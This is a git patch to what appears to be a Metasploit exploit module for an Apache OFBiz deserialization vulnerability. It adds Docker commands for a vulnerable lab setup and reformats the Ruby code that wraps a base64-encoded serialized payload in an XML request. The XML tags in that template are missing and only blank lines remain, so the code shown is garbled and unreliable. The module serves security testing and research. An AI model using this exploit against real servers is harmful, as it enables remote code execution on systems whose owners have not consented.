From ea1f3d60f11fbb7b6ccac0254bbd1ea6219a7b1e Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Mon, 17 Aug 2020 10:03:44 -0400
Subject: [PATCH] Adjust XML whitespace and add commands to the setup docs
---
 .../linux/http/apache_ofbiz_deserialiation.md | 7 ++++++
 .../linux/http/apache_ofbiz_deserialiation.rb | 23 ++++++++++++-------
 2 files changed, 22 insertions(+), 8 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md
index 1fe2594ce8..56504076ec 100644
--- a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md
+++ b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md
@@ -10,6 +10,13 @@ versions prior to 17.12.04.
 You can use .
+1. Initialize the database with demo data (`INIT_DB=2`)
+ * `docker run --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`
+1. Start a postgres instance
+ * `docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres`
+1. Link the database and OFBiz containers
+ * `docker run -d -p 80:8080 -p 8443:8443 --link some-postgres:postgres opensourceknight/ofbiz:15.12`
+
 ## Verification Steps
 Follow [Setup](#setup) and [Scenarios](#scenarios).
diff --git a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb
index 022582991e..d593bb4c2b 100644
--- a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb
+++ b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb
@@ -137,14 +137,21 @@ class MetasploitModule < Msf::Exploit::Remote
 'data' => Nokogiri::XML(<<~XML, &:noblanks).to_xml
- #{rand_text_alphanumeric(8..42)}
-
-
- #{rand_text_alphanumeric(8..42)}
-
-
- #{Rex::Text.encode_base64(data)}
-
-
+ #{rand_text_alphanumeric(8..42)}
+
+
+
+
+
+
+ #{rand_text_alphanumeric(8..42)}
+
+
+ #{Rex::Text.encode_base64(data)}
+
+
+
+
+
+
 XML
 )